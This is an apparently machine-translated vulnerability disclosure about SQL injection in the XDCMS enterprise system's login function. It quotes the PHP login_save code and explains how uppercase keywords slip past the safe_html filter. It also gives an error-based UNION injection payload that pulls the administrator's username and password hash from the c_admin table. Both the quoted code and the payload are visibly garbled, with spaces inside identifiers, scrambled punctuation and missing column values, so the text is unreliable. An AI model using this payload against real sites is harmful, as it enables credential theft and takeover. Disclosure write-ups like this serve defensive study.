XDCMS enterprise management system SQL Injection #2

The latest version of XDCMS enterprise management system, due to lax filtering, can bypass restrictions, resulting in SQL injection in the XDCMS enterprise management system login function, look at \ system \ modules \ member \ index. PHP file: login_save is called during logon for Logon verification. The problem lies in index. login_save function of php:

Public function login_save () {$ username = safe_html ($ _ POST ['username']); // obtain the username and filter it using safe_html. This vulnerability exists and can be bypassed, inject $ password = safe_html ($ _ POST ['Password']); if (empty ($ username) | empty ($ password )) {showmsg (C ('user _ pass_empty '),'-1');} $ SQL = "select * from ". DB_PRE. "member where 'username' = '$ username'"; // inject if ($ this-> mysql-> num_rows ($ SQL) here by bypassing the restriction) = 0) {showmsg (C ('Member _ not_exist '),'-1');} $ password = m D5 (md5 ($ password); $ rs = $ this-> mysql-> get_one ($ SQL); if ($ password! = $ Rs ['Password']) {showmsg (C ('password _ error'), '-1 ');} if ($ rs ['is _ lock'] = 1) {showmsg (C ('user _ lock'), '-1 ');} $ logins = $ rs ["logins"] + 1; $ ip = safe_replace (safe_html (getip (); $ this-> mysql-> db_update ("member ", "'last _ ip' = '". $ ip. "', 'last _ time' = ". datetime (). ", 'logins' = ". $ logins, "'username' = '$ username'"); Cookie: _ setcookie (array ('name' => 'Member _ user ', 'value' => $ username); Cookie: _ setcookie (array ('name' => 'Member _ Userid', 'value' => $ rs ['userid']); Cookie: _ setcookie (array ('name' => 'Member _ groupid ', 'value' => $ rs ['groupid']); unset ($ rs); showmsg (C ("login_success"), "index. php? M = member ");}

 

Because safe_html is used to filter UserName, safe_html only filters sensitive words and = and * According to lowercase characters in SQL injection. However, this is only a defect and can be bypassed,. We use a lower-case SQL statement that is not practical = and * When logging on, we capture packets and add the following content after the UserName value: 'Union SELECT, 9, 10, 11,12, 13,14 FROM (SELECT count (1), concat (round (rand (0), (SELECT concat (username, 0x23, password) FROM c_admin LIMIT 0, 1 )) a FROM information_schema.tables GROUP by a) B # the Administrator's username and password can be injected.
Solution:Strict Filtering